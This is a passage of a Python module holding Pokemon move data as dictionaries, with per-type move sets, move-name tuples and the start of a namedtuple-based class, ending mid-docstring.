\"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 75,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"\")\n\nSLASH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 70,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"High critical hit ratio.\")\n\nSLEEP_POWDER = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 75,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nSLUDGE = dict(\n \tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 65,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May poison opponent.\")\n\nSMOG = dict(\n \tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 30,\n\tACCURACY = 70,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May poison opponent.\")\n\nSMOKESCREEN = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Lowers opponent's ACCURACY.\")\n\nSOFT_BOILED = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User recovers half its max HP.\")\n\nSOLAR_BEAM = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 120, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Charges on first turn, attacks on second.\")\n\nSONIC_BOOM = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = None,\n\tACCURACY = 90,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Always inflicts 20 HP.\")\n\nSPIKE_CANNON = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 20,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nSPLASH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Doesn't do ANYTHING.\")\n\nSPORE = dict(\n \tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nSTOMP = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 65,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May cause flinching.\")\n\nSTRENGTH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"\")\n\nSTRING_SHOT = dict(\n\tELEMENT_TYPE = \"BUG\",\n\tATTRIBUTES = BUG,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 95,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Sharply lowers opponent's Speed.\")\n\nSTRUGGLE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 100,\n\tPOWER_POINTS = None,\n\tDESCRIPTION = \"Only usable when all PP are gone. Hurts the user.\")\n\nSTUN_SPORE = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 75,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Paralyzes opponent.\")\n\nSUBMISSION = dict(\n \tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 80,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"User receives recoil damage.\")\n\nSUBSTITUTE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Uses HP to creates a decoy that takes hits.\")\n\nSUPER_FANG = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Always takes off half of the opponent's HP.\")\n\nSUPERSONIC = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 55,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Confuses opponent.\")\n\nSURF = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Hits all adjacent Pokemon.\")\n\nSWIFT = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 60,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Ignores ACCURACY and Evasiveness.\")\n\nSWORDS_DANCE = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Sharply raises user's Attack.\")\n\nTACKLE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nTAIL_WHIP = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Lowers opponent's Defense.\")\n\nTAKE_DOWN = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 90,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"User receives recoil damage.\")\n\nTELEPORT = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Allows user to flee wild battles; also warps player to last PokeCenter.\")\n\nTHRASH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 120,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User attacks for 2-3 turns but then becomes confused.\")\n\nTHUNDER = dict(\n \tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 110,\n\tACCURACY = 70,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nTHUNDER_PUNCH = dict(\n\tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 75,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nTHUNDER_SHOCK = dict(\n\tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40, \n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nTHUNDER_WAVE = dict(\n\tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 90,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Paralyzes opponent.\")\n\nTHUNDERBOLT = dict(\n \tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nTOXIC = dict(\n \tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Badly poisons opponent.\")\n\nTRANSFORM = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User takes on the form and attacks of the opponent.\")\n\nTRI_ATTACK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 80, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May paralyze, burn or freeze opponent.\")\n\nTWINEEDLE = dict(\n \tELEMENT_TYPE = \"BUG\",\n\tATTRIBUTES = BUG,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 25,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Hits twice in one turn. May poison opponent.\")\n\nVICE_GRIP = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 55,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"\")\n\nVINE_WHIP = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 45,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"\")\n\nWATER_GUN = dict(\n\tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40, \n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"\")\n\nWATERFALL = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May cause flinching.\")\n\nWHIRLWIND = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"In battles, the opponent switches. In the wild, the Pokemon runs.\")\n\nWING_ATTACK = dict(\n\tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 60,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nWITHDRAW = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Raises user's Defense.\")\n\nWRAP = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 90,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Traps opponent, damaging them for 4-5 turns.\")\n\n\"\"\"Dictionary containing the primary Pokemon moves.\n\nKey contains collection of dictionaries containing move properties and statistics.\n\"\"\"\n\nMOVE_SET = {\n\t\"ABSORB\": ABSORB,\n\t\"ACID\": ACID,\n\t\"ACID_ARMOUR\": ACID_ARMOUR,\n\t\"AGILITY\": AGILITY,\n\t\"AMNESIA\": AMNESIA,\n\t\"AURORA_BEAM\": AURORA_BEAM,\n\t\"BARRAGE\": BARRAGE,\n\t\"BARRIER\": BARRIER,\n\t\"BIDE\": BIDE,\n\t\"BIND\": BIND,\n\t\"BITE\": BITE,\n\t\"BLIZZARD\": BLIZZARD,\n\t\"BODY_SLAM\": BODY_SLAM,\n\t\"BONEMERANG\": BONEMERANG,\n\t\"BONE_CLUB\": BONE_CLUB,\n\t\"BUBBLE\": BUBBLE,\n\t\"BUBBLE_BEAM\": BUBBLE_BEAM,\n\t\"CLAMP\": CLAMP,\n\t\"COMET_PUNCH\": COMET_PUNCH,\n\t\"CONFUSE_RAY\": CONFUSE_RAY,\n\t\"CONFUSION\": CONFUSION,\n\t\"CONSTRICT\": CONSTRICT,\n\t\"CONVERSION\": CONVERSION,\n\t\"COUNTER\": COUNTER,\n\t\"CRABHAMMER\": CRABHAMMER,\n\t\"CUT\": CUT,\n\t\"DEFENSE_CURL\": DEFENSE_CURL,\n\t\"DIG\": DIG,\n\t\"DISABLE\": DISABLE,\n\t\"DIZZY_PUNCH\": DIZZY_PUNCH,\n\t\"DOUBLE_EDGE\": DOUBLE_EDGE,\n\t\"DOUBLE_KICK\": DOUBLE_KICK,\n\t\"DOUBLE_SLAP\": DOUBLE_SLAP,\n\t\"DOUBLE_TEAM\": DOUBLE_TEAM,\n\t\"DRAGON_RAGE\": DRAGON_RAGE,\n\t\"DREAM_EATER\": DREAM_EATER,\n\t\"DRILL_PECK\": DRILL_PECK,\n\t\"EARTHQUAKE\": EARTHQUAKE,\n\t\"EGG_BOMB\": EGG_BOMB,\n\t\"EMBER\": EMBER,\n\t\"EXPLOSION\": EXPLOSION,\n\t\"FIRE_BLAST\": FIRE_BLAST,\n\t\"FIRE_PUNCH\": FIRE_PUNCH,\n\t\"FIRE_SPIN\": FIRE_SPIN,\n\t\"FISSURE\": FISSURE,\n\t\"FLAMETHROWER\": FLAMETHROWER,\n\t\"FLASH\": FLASH,\n\t\"FLY\": FLY,\n\t\"FOCUS_ENERGY\": FOCUS_ENERGY,\n\t\"FURY_ATTACK\": FURY_ATTACK,\n\t\"FURY_SWIPES\": FURY_SWIPES,\n\t\"GLARE\": GLARE,\n\t\"GROWL\": GROWL,\n\t\"GROWTH\": GROWTH,\n\t\"GUILLOTINE\": GUILLOTINE,\n\t\"GUST\": GUST,\n\t\"HARDEN\": HARDEN,\n\t\"HAZE\": HAZE,\n\t\"HEADBUTT\": HEADBUTT,\n\t\"HORN_ATTACK\": HORN_ATTACK,\n\t\"HORN_DRILL\": HORN_DRILL,\n\t\"HYDRO_PUMP\": HYDRO_PUMP,\n\t\"HYPER_BEAM\": HYPER_BEAM,\n\t\"HYPER_Fang\": HYPER_Fang,\n\t\"HYPNOSIS\": HYPNOSIS,\n\t\"ICE_BEAM\": ICE_BEAM,\n\t\"ICE_PUNCH\": ICE_PUNCH,\n\t\"JUMP_KICK\": JUMP_KICK,\n\t\"KARATE_CHOP\": KARATE_CHOP,\n\t\"KINESIS\": KINESIS,\n\t\"LEECH_LIFE\": LEECH_LIFE,\n\t\"LEECH_SEED\": LEECH_SEED,\n\t\"LEER\": LEER,\n\t\"LICK\": LICK,\n\t\"LIGHT_SCREEN\": LIGHT_SCREEN,\n\t\"LOVELY_KISS\": LOVELY_KISS,\n\t\"LOW_KICK\": LOW_KICK,\n\t\"MEDITATE\": MEDITATE,\n\t\"MEGA_DRAIN\": MEGA_DRAIN,\n\t\"MEGA_KICK\": MEGA_KICK,\n\t\"MEGA_PUNCH\": MEGA_PUNCH,\n\t\"METRONOME\": METRONOME,\n\t\"MIMIC\": MIMIC,\n\t\"MINIMIZE\": MINIMIZE,\n\t\"MIRROR_MOVE\": MIRROR_MOVE,\n\t\"MIST\": MIST,\n\t\"NIGHT_SHADE\": NIGHT_SHADE,\n\t\"PAY_DAY\": PAY_DAY,\n\t\"PECK\": PECK,\n\t\"PETAL_DANCE\": PETAL_DANCE,\n\t\"PIN_MISSILE\": PIN_MISSILE,\n\t\"POISON_GAS\": POISON_GAS,\n\t\"POISON_POWDER\": POISON_POWDER,\n\t\"POISON_STING\": POISON_STING,\n\t\"POUND\": POUND,\n\t\"PSYBEAM\": PSYBEAM,\n\t\"PSYCHIC\": PSYCHIC,\n\t\"PSYWAVE\": PSYWAVE,\n\t\"QUICK_ATTACK\": QUICK_ATTACK,\n\t\"RAGE\": RAGE,\n\t\"RAZOR_LEAF\": RAZOR_LEAF,\n\t\"RAZOR_WIND\": RAZOR_WIND,\n\t\"RECOVER\": RECOVER,\n\t\"REFLECT\": REFLECT,\n\t\"REST\": REST,\n\t\"ROAR\": ROAR,\n\t\"ROCK_SLIDE\": ROCK_SLIDE,\n\t\"ROCK_THROW\": ROCK_THROW,\n\t\"ROLLING_KICK\": ROLLING_KICK,\n\t\"SAND_ATTACK\": SAND_ATTACK,\n\t\"SCRATCH\": SCRATCH,\n\t\"SCREECH\": SCREECH,\n\t\"SEISMIC_TOSS\": SEISMIC_TOSS,\n\t\"SELF_DESTRUCT\": SELF_DESTRUCT,\n\t\"SHARPEN\": SHARPEN,\n\t\"SING\": SING,\n\t\"SKULL_BASH\": SKULL_BASH,\n\t\"SKY_ATTACK\": SKY_ATTACK,\n\t\"SLAM\": SLAM,\n\t\"SLASH\": SLASH,\n\t\"SLEEP_POWDER\": SLEEP_POWDER,\n\t\"SLUDGE\": SLUDGE,\n\t\"SMOG\": SMOG,\n\t\"SMOKESCREEN\": SMOKESCREEN,\n\t\"SOFT_BOILED\": SOFT_BOILED,\n\t\"SOLAR_BEAM\": SOLAR_BEAM,\n\t\"SONIC_BOOM\": SONIC_BOOM,\n\t\"SPIKE_CANNON\": SPIKE_CANNON,\n\t\"SPLASH\": SPLASH,\n\t\"SPORE\": SPORE,\n\t\"STOMP\": STOMP,\n\t\"STRENGTH\": STRENGTH,\n\t\"STRING_SHOT\": STRING_SHOT,\n\t\"STRUGGLE\": STRUGGLE,\n\t\"STUN_SPORE\": STUN_SPORE,\n\t\"SUBMISSION\": SUBMISSION,\n\t\"SUBSTITUTE\": SUBSTITUTE,\n\t\"SUPERSONIC\": SUPERSONIC,\n\t\"SUPER_FANG\": SUPER_FANG,\n\t\"SURF\": SURF,\n\t\"SWIFT\": SWIFT,\n\t\"SWORDS_DANCE\": SWORDS_DANCE,\n\t\"TACKLE\": TACKLE,\n\t\"TAIL_WHIP\": TAIL_WHIP,\n\t\"TAKE_DOWN\": TAKE_DOWN,\n\t\"TELEPORT\": TELEPORT,\n\t\"THRASH\": THRASH,\n\t\"THUNDER\": THUNDER,\n\t\"THUNDERBOLT\": THUNDERBOLT,\n\t\"THUNDER_PUNCH\": THUNDER_PUNCH,\n\t\"THUNDER_SHOCK\": THUNDER_SHOCK,\n\t\"THUNDER_WAVE\": THUNDER_WAVE,\n\t\"TOXIC\": TOXIC,\n\t\"TRANSFORM\": TRANSFORM,\n\t\"TRI_ATTACK\": TRI_ATTACK,\n\t\"TWINEEDLE\": TWINEEDLE,\n\t\"VICE_GRIP\": VICE_GRIP,\n\t\"VINE_WHIP\": VINE_WHIP,\n\t\"WATERFALL\": WATERFALL,\n\t\"WATER_GUN\": WATER_GUN,\n\t\"WHIRLWIND\": WHIRLWIND,\n\t\"WING_ATTACK\": WING_ATTACK,\n\t\"WITHDRAW\": WITHDRAW,\n\t\"WRAP\": WRAP}\n\n\"\"\"Dictionary containing the moves for Bug type Pokemon.\"\"\"\n\nBUG_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"BUG\"}\n\n\"\"\"Dictionary containing the moves for Dark type Pokemon.\"\"\"\n\nDARK_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"DARK\"}\n\n\"\"\"Dictionary containing the moves for Dragon type Pokemon.\"\"\"\n\nDRAGON_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"DRAGON\"}\n\n\"\"\"Dictionary containing the moves for Electric type Pokemon.\"\"\"\n\nELECTRIC_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"ELECTRIC\"}\n\n\"\"\"Dictionary containing the moves for Fairy type Pokemon.\"\"\"\n\nFAIRY_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"FAIRY\" }\n\n\"\"\"Dictionary containing the moves for Fighting type Pokemon.\"\"\"\n\nFIGHTING_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"FIGHTING\"}\n\n\"\"\"Dictionary containing the moves for Fire type Pokemon.\"\"\"\n\nFIRE_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"FIRE\"}\n\n\"\"\"Dictionary containing the moves for Flying type Pokemon.\"\"\"\n\nFLYING_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"FLYING\"}\n\n\"\"\"Dictionary containing the moves for Ghost type Pokemon.\"\"\"\n\nGHOST_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"GHOST\"}\n\n\"\"\"Dictionary containing the moves for Grass type Pokemon.\"\"\"\n\nGRASS_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"GRASS\"}\n\n\"\"\"Dictionary containing the moves for Ground type Pokemon.\"\"\"\n\nGROUND_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"GROUND\"}\n\n\"\"\"Dictionary containing the moves for Ice type Pokemon.\"\"\"\n\nICE_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"ICE\"}\n\n\"\"\"Dictionary containing the moves for Normal type Pokemon.\"\"\"\n\nNORMAL_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"NORMAL\"}\n\n\"\"\"Dictionary containing the moves for Poison type Pokemon.\"\"\"\n\nPOISON_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"POISON\"}\n\n\"\"\"Dictionary containing the moves for Psychic type Pokemon.\"\"\"\n\nPSYCHIC_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"PSYCHIC\"}\n\n\"\"\"Dictionary containing the moves for Rock type Pokemon.\"\"\"\n\nROCK_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"ROCK\"}\n\n\"\"\"Dictionary containing the moves for Steel type Pokemon.\"\"\"\n\nSTEEL_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"STEEL\"}\n\n\"\"\"Dictionary containing the moves for Water type Pokemon.\"\"\"\n\nWATER_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"WATER\"}\n\n\"\"\"Tuple containing strings of Pokemon moves.\n\nNames are generated from initialised names. Requires Pokemon move is defined in Move Set dictionary.\n\"\"\"\n\nMOVE_NAMES = tuple(\n\tdict.keys(MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Bug type Pokemon.\"\"\"\n\nBUG_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(BUG_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Dark type Pokemon.\"\"\"\n\nDARK_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(DARK_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Dragon type Pokemon.\"\"\"\n\nDRAGON_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(DRAGON_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Electric type Pokemon.\"\"\"\n\nELECTRIC_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(ELECTRIC_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Fairy type Pokemon.\"\"\"\n\nFAIRY_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(FAIRY_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Fighting type Pokemon.\"\"\"\n\nFIGHTING_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(FIGHTING_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Fire type Pokemon.\"\"\"\n\nFIRE_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(FIRE_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Flying type Pokemon.\"\"\"\n\nFLYING_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(FLYING_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Ghost type Pokemon.\"\"\"\n\nGHOST_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(GHOST_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Grass type Pokemon.\"\"\"\n\nGRASS_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(GRASS_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Ground type Pokemon.\"\"\"\n\nGROUND_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(GROUND_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Ice type Pokemon.\"\"\"\n\nICE_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(ICE_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Normal type Pokemon.\"\"\"\n\nNORMAL_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(NORMAL_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Poison type Pokemon.\"\"\"\n\nPOISON_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(POISON_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Psychic type Pokemon.\"\"\"\n\nPSYCHIC_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(PSYCHIC_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Rock type Pokemon.\"\"\"\n\nROCK_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(ROCK_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Steel type Pokemon.\"\"\"\n\nSTEEL_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(STEEL_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Water type Pokemon.\"\"\"\n\nWATER_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(WATER_TYPE_MOVE_SET))\n\n\"\"\"String generated from the required keys for Pokemon moves.\"\"\"\n\nMOVE_SET_KEYS_STRS = \" \".join([\n\t\"ELEMENT_TYPE\",\n\t\"ATTRIBUTES\",\n\t\"CATEGORY\",\n\t\"POWER\", \n\t\"ACCURACY\",\n\t\"POWER_POINTS\",\n\t\"DESCRIPTION\"])\n\n######################\n### Module classes ###\n######################\n\nclass Generate (namedtuple(\"Props\", MOVE_SET_KEYS_STRS)):\n\t\"\"\"Generates type properties for defined Pokemon type.\"\"\"\n\n\tdef __new__ (self, pokemon_move):\n\t\t\"\"\"Inherit constants for class from named tuple Props.\n\t\t\n\t\tAnticipated to be consumed in Pokemon base type class constructor. \n\t\t\"\"\"\n\n\t\t\"\"\"\n\t\t>>> import 